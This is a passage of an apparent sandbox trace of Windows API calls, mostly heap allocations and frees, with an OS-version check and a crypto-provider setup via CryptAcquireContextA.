hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0253.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0253.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.635] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0253.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0253.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.636] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0253.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0253.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0253.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0253.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0253.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0253.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0253.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0253.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0253.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.638] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0253.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0253.639] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0253.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0253.639] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0253.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0253.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.640] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0253.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0253.640] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0253.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0253.641] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0253.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0253.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0253.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0253.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.644] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0253.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0253.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0253.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.646] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0253.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0253.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0253.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0253.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.647] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0253.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0253.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3500 | out: hHeap=0x25c0000) returned 1 [0253.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.647] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0253.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0253.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0253.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.650] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0253.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0253.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 